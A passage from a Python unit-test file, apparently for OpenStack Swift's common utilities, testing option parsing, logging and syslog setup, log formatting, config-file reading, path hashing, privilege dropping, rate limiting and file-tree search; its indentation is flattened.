conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
# verify conf file must exist, context manager will delete temp file
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
# Doesn't really test that the log facility is truly being used all the
# way to syslog; but exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
# Since socket on OSX is in /var/run/syslog, there will be
# a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('errno.ECONNREFUSED message test' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
# test eventlet.Timeout
connection_timeout = ConnectionTimeout(42, 'my error message')
log_exception(connection_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('ConnectionTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' not in log_msg)
connection_timeout.cancel()
message_timeout = MessageTimeout(42, 'my error message')
log_exception(message_timeout)
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('MessageTimeout' in log_msg)
self.assertTrue('(42s)' in log_msg)
self.assertTrue('my error message' in log_msg)
message_timeout.cancel()
# test unhandled
log_exception(Exception('my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter_max_line_length(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
formatter = utils.SwiftLogFormatter(max_line_length=10)
handler.setFormatter(formatter)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
logger.info('12345')
self.assertEqual(strip_value(sio), '12345\n')
logger.info('1234567890')
self.assertEqual(strip_value(sio), '1234567890\n')
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12 ... de\n')
formatter.max_line_length = 11
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123 ... cde\n')
formatter.max_line_length = 0
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
formatter.max_line_length = 1
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1\n')
formatter.max_line_length = 2
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12\n')
formatter.max_line_length = 3
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123\n')
formatter.max_line_length = 4
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234\n')
formatter.max_line_length = 5
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '12345\n')
formatter.max_line_length = 6
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '123456\n')
formatter.max_line_length = 7
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1 ... e\n')
formatter.max_line_length = -10
logger.info('1234567890abcde')
self.assertEqual(strip_value(sio), '1234567890abcde\n')
finally:
logger.logger.removeHandler(handler)
@reset_logger_state
def test_swift_log_formatter(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
handler.setFormatter(utils.SwiftLogFormatter())
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
try:
self.assertFalse(logger.txn_id)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('txn' not in log_msg)
logger.txn_id = '12345'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('txn' in log_msg)
self.assertTrue('12345' in log_msg)
# test no txn on info message
self.assertEqual(logger.txn_id, '12345')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('txn' not in log_msg)
self.assertTrue('12345' not in log_msg)
# test txn already in message
self.assertEqual(logger.txn_id, '12345')
logger.warn('test 12345 test')
self.assertEqual(strip_value(sio), 'test 12345 test\n')
# Test multi line collapsing
logger.error('my\nerror\nmessage')
log_msg = strip_value(sio)
self.assertTrue('my#012error#012message' in log_msg)
# test client_ip
self.assertFalse(logger.client_ip)
logger.error('my error message')
log_msg = strip_value(sio)
self.assertTrue('my error message' in log_msg)
self.assertTrue('client_ip' not in log_msg)
logger.client_ip = '1.2.3.4'
logger.error('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' in log_msg)
self.assertTrue('1.2.3.4' in log_msg)
# test no client_ip on info message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.info('test')
log_msg = strip_value(sio)
self.assertTrue('client_ip' not in log_msg)
self.assertTrue('1.2.3.4' not in log_msg)
# test client_ip (and txn) already in message
self.assertEqual(logger.client_ip, '1.2.3.4')
logger.warn('test 1.2.3.4 test 12345')
self.assertEqual(strip_value(sio), 'test 1.2.3.4 test 12345\n')
finally:
logger.logger.removeHandler(handler)
def test_storage_directory(self):
self.assertEqual(utils.storage_directory('objects', '1', 'ABCDEF'),
'objects/1/DEF/ABCDEF')
def test_expand_ipv6(self):
expanded_ipv6 = "fe80::204:61ff:fe9d:f156"
upper_ipv6 = "fe80:0000:0000:0000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(upper_ipv6))
omit_ipv6 = "fe80:0000:0000::0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(omit_ipv6))
less_num_ipv6 = "fe80:0:00:000:0204:61ff:fe9d:f156"
self.assertEqual(expanded_ipv6, utils.expand_ipv6(less_num_ipv6))
def test_whataremyips(self):
myips = utils.whataremyips()
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_to_all(self):
for any_addr in ('0.0.0.0', '0000:0000:0000:0000:0000:0000:0000:0000',
'::0', '::0000', '::',
# Wacky parse-error input produces all IPs
'I am a bear'):
myips = utils.whataremyips(any_addr)
self.assertTrue(len(myips) > 1)
self.assertTrue('127.0.0.1' in myips)
def test_whataremyips_bind_ip_specific(self):
self.assertEqual(['1.2.3.4'], utils.whataremyips('1.2.3.4'))
def test_whataremyips_error(self):
def my_interfaces():
return ['eth0']
def my_ifaddress_error(interface):
raise ValueError
with patch('netifaces.interfaces', my_interfaces), \
patch('netifaces.ifaddresses', my_ifaddress_error):
self.assertEqual(utils.whataremyips(), [])
def test_whataremyips_ipv6(self):
test_ipv6_address = '2001:6b0:dead:beef:2::32'
test_interface = 'eth0'
def my_ipv6_interfaces():
return ['eth0']
def my_ipv6_ifaddresses(interface):
return {AF_INET6:
[{'netmask': 'ffff:ffff:ffff:ffff::',
'addr': '%s%%%s' % (test_ipv6_address, test_interface)}]}
with patch('netifaces.interfaces', my_ipv6_interfaces), \
patch('netifaces.ifaddresses', my_ipv6_ifaddresses):
myips = utils.whataremyips()
self.assertEqual(len(myips), 1)
self.assertEqual(myips[0], test_ipv6_address)
def test_hash_path(self):
# Yes, these tests are deliberately very fragile. We want to make sure
# that if someones changes the results hash_path produces, they know it
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''):
self.assertEqual(utils.hash_path('a'),
'1c84525acb02107ea475dcd3d09c2c58')
self.assertEqual(utils.hash_path('a', 'c'),
'33379ecb053aa5c9e356c68997cbb59e')
self.assertEqual(utils.hash_path('a', 'c', 'o'),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'06fbf0b514e5199dfc4e00f42eb5ea83')
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=True),
'\x06\xfb\xf0\xb5\x14\xe5\x19\x9d\xfcN'
'\x00\xf4.\xb5\xea\x83')
self.assertRaises(ValueError, utils.hash_path, 'a', object='o')
utils.HASH_PATH_PREFIX = 'abcdef'
self.assertEqual(utils.hash_path('a', 'c', 'o', raw_digest=False),
'363f9b535bfb7d17a43a46a358afca0e')
def test_validate_hash_conf(self):
# no section causes InvalidHashPathConfigError
self._test_validate_hash_conf([], [], True)
# 'swift-hash' section is there but no options causes
# InvalidHashPathConfigError
self._test_validate_hash_conf(['swift-hash'], [], True)
# if we have the section and either of prefix or suffix,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_prefix'], False)
self._test_validate_hash_conf(
['swift-hash'], ['swift_hash_path_suffix'], False)
# definitely, we have the section and both of them,
# InvalidHashPathConfigError doesn't occur
self._test_validate_hash_conf(
['swift-hash'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], False)
# But invalid section name should make an error even if valid
# options are there
self._test_validate_hash_conf(
['swift-hash-xxx'],
['swift_hash_path_suffix', 'swift_hash_path_prefix'], True)
def _test_validate_hash_conf(self, sections, options, should_raise_error):
class FakeConfigParser(object):
def read(self, conf_path):
return True
def get(self, section, option):
if section not in sections:
raise NoSectionError('section error')
elif option not in options:
raise NoOptionError('option error', 'this option')
else:
return 'some_option_value'
with mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
mock.patch('swift.common.utils.HASH_PATH_SUFFIX', ''), \
mock.patch('swift.common.utils.ConfigParser',
FakeConfigParser):
try:
utils.validate_hash_conf()
except utils.InvalidHashPathConfigError:
if not should_raise_error:
self.fail('validate_hash_conf should not raise an error')
else:
if should_raise_error:
self.fail('validate_hash_conf should raise an error')
def test_load_libc_function(self):
self.assertTrue(callable(
utils.load_libc_function('printf')))
self.assertTrue(callable(
utils.load_libc_function('some_not_real_function')))
self.assertRaises(AttributeError,
utils.load_libc_function, 'some_not_real_function',
fail_if_missing=True)
def test_readconf(self):
conf = '''[section1]
foo = bar
[section2]
log_name = yarr'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': 'yarr'}}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1')
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar'}
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile,
'section2').get('log_name')
expected = 'yarr'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
log_name='foo').get('log_name')
expected = 'foo'
self.assertEqual(result, expected)
conffile = conf_object_maker()
result = utils.readconf(conffile, 'section1',
defaults={'bar': 'baz'})
expected = {'__file__': conffile, 'log_name': 'section1',
'foo': 'bar', 'bar': 'baz'}
self.assertEqual(result, expected)
self.assertRaises(SystemExit, utils.readconf, temppath, 'section3')
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_raw(self):
conf = '''[section1]
foo = bar
[section2]
log_name = %(yarr)s'''
# setup a real file
fd, temppath = tempfile.mkstemp(dir='/tmp')
with os.fdopen(fd, 'wb') as f:
f.write(conf)
make_filename = lambda: temppath
# setup a file stream
make_fp = lambda: StringIO(conf)
for conf_object_maker in (make_filename, make_fp):
conffile = conf_object_maker()
result = utils.readconf(conffile, raw=True)
expected = {'__file__': conffile,
'log_name': None,
'section1': {'foo': 'bar'},
'section2': {'log_name': '%(yarr)s'}}
self.assertEqual(result, expected)
os.unlink(temppath)
self.assertRaises(SystemExit, utils.readconf, temppath)
def test_readconf_dir(self):
config_dir = {
'server.conf.d/01.conf': """
[DEFAULT]
port = 8080
foo = bar
[section1]
name=section1
""",
'server.conf.d/section2.conf': """
[DEFAULT]
port = 8081
bar = baz
[section2]
name=section2
""",
'other-server.conf.d/01.conf': """
[DEFAULT]
port = 8082
[section3]
name=section3
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section1',
},
'section2': {
'port': '8081',
'foo': 'bar',
'bar': 'baz',
'name': 'section2',
},
}
self.assertEqual(conf, expected)
def test_readconf_dir_ignores_hidden_and_nondotconf_files(self):
config_dir = {
'server.conf.d/01.conf': """
[section1]
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[section]
port = 8081
""",
'server.conf.d/01.conf-bak': """
[section]
port = 8082
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = utils.readconf(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'log_name': None,
'section1': {
'port': '8080',
},
}
self.assertEqual(conf, expected)
def test_drop_privileges(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'setsid',
'chdir', 'umask')
utils.os = MockOs(called_funcs=required_func_calls)
# exercise the code
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
import pwd
self.assertEqual(pwd.getpwnam(user)[5], utils.os.environ['HOME'])
groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
groups.append(pwd.getpwnam(user).pw_gid)
self.assertEqual(set(groups), set(os.getgroups()))
# reset; test same args, OSError trying to get session leader
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=('setsid',))
for func in required_func_calls:
self.assertFalse(utils.os.called_funcs.get(func, False))
utils.drop_privileges(user)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
def test_drop_privileges_no_call_setsid(self):
user = getuser()
# over-ride os with mock
required_func_calls = ('setgroups', 'setgid', 'setuid', 'chdir',
'umask')
bad_func_calls = ('setsid',)
utils.os = MockOs(called_funcs=required_func_calls,
raise_funcs=bad_func_calls)
# exercise the code
utils.drop_privileges(user, call_setsid=False)
for func in required_func_calls:
self.assertTrue(utils.os.called_funcs[func])
for func in bad_func_calls:
self.assertTrue(func not in utils.os.called_funcs)
@reset_logger_state
def test_capture_stdio(self):
# stubs
logger = utils.get_logger(None, 'dummy')
# mock utils system modules
_orig_sys = utils.sys
_orig_os = utils.os
try:
utils.sys = MockSys()
utils.os = MockOs()
# basic test
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds)
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test same args, but exc when trying to close stdio
utils.os = MockOs(raise_funcs=('dup2',))
utils.sys = MockSys()
# test unable to close stdio
utils.capture_stdio(logger)
self.assertTrue(utils.sys.excepthook is not None)
self.assertEqual(utils.os.closed_fds, [])
self.assertTrue(
isinstance(utils.sys.stdout, utils.LoggerFileObject))
self.assertTrue(
isinstance(utils.sys.stderr, utils.LoggerFileObject))
# reset; test some other args
utils.os = MockOs()
utils.sys = MockSys()
logger = utils.get_logger(None, log_to_console=True)
# test console log
utils.capture_stdio(logger, capture_stdout=False,
capture_stderr=False)
self.assertTrue(utils.sys.excepthook is not None)
# when logging to console, stderr remains open
self.assertEqual(utils.os.closed_fds, utils.sys.stdio_fds[:2])
reset_loggers()
# stdio not captured
self.assertFalse(isinstance(utils.sys.stdout,
utils.LoggerFileObject))
self.assertFalse(isinstance(utils.sys.stderr,
utils.LoggerFileObject))
finally:
utils.sys = _orig_sys
utils.os = _orig_os
@reset_logger_state
def test_get_logger_console(self):
logger = utils.get_logger(None)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertFalse(console_handlers)
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertTrue(console_handlers)
# make sure you can't have two console handlers
self.assertEqual(len(console_handlers), 1)
old_handler = console_handlers[0]
logger = utils.get_logger(None, log_to_console=True)
console_handlers = [h for h in logger.logger.handlers if
isinstance(h, logging.StreamHandler)]
self.assertEqual(len(console_handlers), 1)
new_handler = console_handlers[0]
self.assertNotEqual(new_handler, old_handler)
def verify_under_pseudo_time(
self, func, target_runtime_ms=1, *args, **kwargs):
curr_time = [42.0]
def my_time():
curr_time[0] += 0.001
return curr_time[0]
def my_sleep(duration):
curr_time[0] += 0.001
curr_time[0] += duration
with patch('time.time', my_time), \
patch('time.sleep', my_sleep), \
patch('eventlet.sleep', my_sleep):
start = time.time()
func(*args, **kwargs)
# make sure it's accurate to 10th of a second, converting the time
# difference to milliseconds, 100 milliseconds is 1/10 of a second
diff_from_target_ms = abs(
target_runtime_ms - ((time.time() - start) * 1000))
self.assertTrue(diff_from_target_ms < 100,
"Expected %d < 100" % diff_from_target_ms)
def test_ratelimit_sleep(self):
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, -5)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(100):
running_time = utils.ratelimit_sleep(running_time, 0)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=1)
def testfunc():
running_time = 0
for i in range(50):
running_time = utils.ratelimit_sleep(running_time, 200)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=250)
def test_ratelimit_sleep_with_incr(self):
def testfunc():
running_time = 0
vals = [5, 17, 0, 3, 11, 30,
40, 4, 13, 2, -1] * 2 # adds up to 248
total = 0
for i in vals:
running_time = utils.ratelimit_sleep(running_time,
500, incr_by=i)
total += i
self.assertEqual(248, total)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=500)
def test_ratelimit_sleep_with_sleep(self):
def testfunc():
running_time = 0
sleeps = [0] * 7 + [.2] * 3 + [0] * 30
for i in sleeps:
running_time = utils.ratelimit_sleep(running_time, 40,
rate_buffer=1)
time.sleep(i)
self.verify_under_pseudo_time(testfunc, target_runtime_ms=900)
def test_urlparse(self):
parsed = utils.urlparse('http://127.0.0.1/')
self.assertEqual(parsed.scheme, 'http')
self.assertEqual(parsed.hostname, '127.0.0.1')
self.assertEqual(parsed.path, '/')
parsed = utils.urlparse('http://127.0.0.1:8080/')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('https://127.0.0.1/')
self.assertEqual(parsed.scheme, 'https')
parsed = utils.urlparse('http://[::1]/')
self.assertEqual(parsed.hostname, '::1')
parsed = utils.urlparse('http://[::1]:8080/')
self.assertEqual(parsed.hostname, '::1')
self.assertEqual(parsed.port, 8080)
parsed = utils.urlparse('www.example.com')
self.assertEqual(parsed.hostname, '')
def test_search_tree(self):
# file match & ext miss
with temptree(['asdf.conf', 'blarg.conf', 'asdf.cfg']) as t:
asdf = utils.search_tree(t, 'a*', '.conf')
self.assertEqual(len(asdf), 1)
self.assertEqual(asdf[0],
os.path.join(t, 'asdf.conf'))
# multi-file match & glob miss & sort
with temptree(['application.bin', 'apple.bin', 'apropos.bin']) as t:
app_bins = utils.search_tree(t, 'app*', 'bin')
self.assertEqual(len(app_bins), 2)
self.assertEqual(app_bins[0],
os.path.join(t, 'apple.bin'))
self.assertEqual(app_bins[1],
os.path.join(t, 'application.bin'))
# test file in folder & ext miss & glob miss
files = (
'sub/file1.ini',
'sub/file2.conf',
'sub.bin',
'bus.ini',
'bus/file3.ini',
)
with temptree(files) as t:
sub_ini = utils.search_tree(t, 'sub*', '.ini')
self.assertEqual(len(sub_ini), 1)
self.assertEqual(sub_ini[0],
os.path.join(t, 'sub/file1.ini'))
# test multi-file in folder & sub-folder & ext miss & glob miss
files = (
'folder_file.txt',
'folder/1.txt',
'folder/sub/2.txt',
'folder2/3.txt',
'Folder3/4.txt'
'folder.rc',
)
with temptree(files) as t:
folder_texts = utils.search_tree(t, 'folder*', '.txt')
self.assertEqual(len(folder_texts), 4)
f1 = os.path.join(t, 'folder_file.txt')
f2 = os.path.join(t, 'folder/1.txt')
f3 = os.path.join(t, 'folder/sub/2.txt')
f4 = os.path.join(t, 'folder2/3.txt')
for f in [f1, f2, f3, f4]:
self.assertTrue(f in folder_texts)
def test_search_tree_with_directory_ext_match(self):
files = (
'object-server/object-server.conf-base',
'object-server/1.conf.d/base.conf',
'object-server/1.conf.d/1.conf',
'object-server/2.conf.d/base.conf',
'object-server/2.conf.d/2.conf',
'object-server/3.conf.d/base.conf',
'object-server/3.conf.d/3.conf',
'object-server/4.conf.d/base.conf',
'object-server/4.conf.d/4.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'object-server', '.conf',
dir_ext='conf.d')
self.assertEqual(len(conf_dirs), 4)
for i in range(4):
conf_dir = os.path.join(t, 'object-server/%d.conf.d' % (i + 1))
self.assertTrue(conf_dir in conf_dirs)
def test_search_tree_conf_dir_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.conf.d/base.conf',
'proxy-server/proxy-server.conf.d/pipeline.conf',
'proxy-server/proxy-noauth.conf.d/base.conf',
'proxy-server/proxy-noauth.conf.d/pipeline.conf',
)
with temptree(files) as t:
conf_dirs = utils.search_tree(t, 'proxy-server', 'noauth.conf',
dir_ext='noauth.conf.d')
self.assertEqual(len(conf_dirs), 1)
conf_dir = conf_dirs[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.conf.d')
self.assertEqual(conf_dir, expected)
def test_search_tree_conf_dir_pid_with_named_conf_match(self):
files = (
'proxy-server/proxy-server.pid.d',
'proxy-server/proxy-noauth.pid.d',
)
with temptree(files) as t:
pid_files = utils.search_tree(t, 'proxy-server',
exts=['noauth.pid', 'noauth.pid.d'])
self.assertEqual(len(pid_files), 1)
pid_file = pid_files[0]
expected = os.path.join(t, 'proxy-server/proxy-noauth.pid.d')
self.assertEqual(pid_file, expected)
def test_write_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'test')
utils.write_file(file_name, 'test')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test')
# and also subdirs
file_name = os.path.join(t, 'subdir/test2')
utils.write_file(file_name, 'test2')
with open(file_name, 'r') as f:
contents = f.read()
self.assertEqual(contents, 'test2')
# but can't over-write files
file_name = os.path.join(t, 'subdir/test2/test3')
self.assertRaises(IOError, utils.write_file, file_name,
'test3')
def test_remove_file(self):
with temptree([]) as t:
file_name = os.path.join(t, 'blah.pid')
# assert no raise
self.assertEqual(os.path.exists(file_name), False)
self.assertEqual(utils.remove_file(file_name), None)
with open(file_name, 'w') as f:
f.write('1')
self.assertTrue(os.path.exists(file_name))
self.assertEqual(utils.remove_file(file_name), None)
self.assertFalse(os.path.exists(file_name))
def test_human_readable(self):
self.assertEqual(utils.human_readable(0), '0')
self.assertEqual(utils.human_readable(1), '1')
self.assertEqual(utils.human_readable(10), '10')
self.assertEqual(utils.human_readable(100), '100')
self.assertEqual(utils.human_readable(999), '999')
self.assertEqual(utils.human_readable(1024), '1Ki')
self.assertEqual(utils.human_readable(1535), '1Ki')
self.assertEqual(utils.human_readable(1536), '2Ki')
self.assertEqual(utils.human_readable(1047552), '1023Ki')
self.assertEqual(utils.human_readable(1048063), '1023Ki')
self.assertEqual(utils.human_readable(1048064), '1Mi')
self.assertEqual(utils.human_readable(1048576), '1Mi')
self.assertEqual(utils.human_readable(1073741824), '1Gi')
self.assertEqual(utils.human_readable(1099511627776), '1Ti')
self.assertEqual(utils.human_readable(1125899906842624), '1Pi')
self.assertEqual(utils.human_readable(1152921504606846976), '1Ei')
self.assertEqual(utils.human_readable(1180591620717411303424), '1Zi')
self.assertEqual(utils.human_readable(1208925819614629174706176),
'1Yi')
self.assertEqual(utils.human_readable(1237940039285380274899124224),
'1024Yi')
def test_validate_sync_to(self):
fname = 'container-sync-realms.conf'
fcontents = '''
[US]
key = 9ff3b71c849749dbaec4ccdd3cbab62b
cluster_dfw1 = http://dfw1.host/v1/
'''
with temptree([fname], [fcontents]) as tempdir:
logger = FakeLogger()
fpath = os.path.join(tempdir, fname)
csr = ContainerSyncRealms(fpath, logger)
for realms_conf in (None, csr):
for goodurl, result in (
('http://1.1.1.1/v1/a/c',
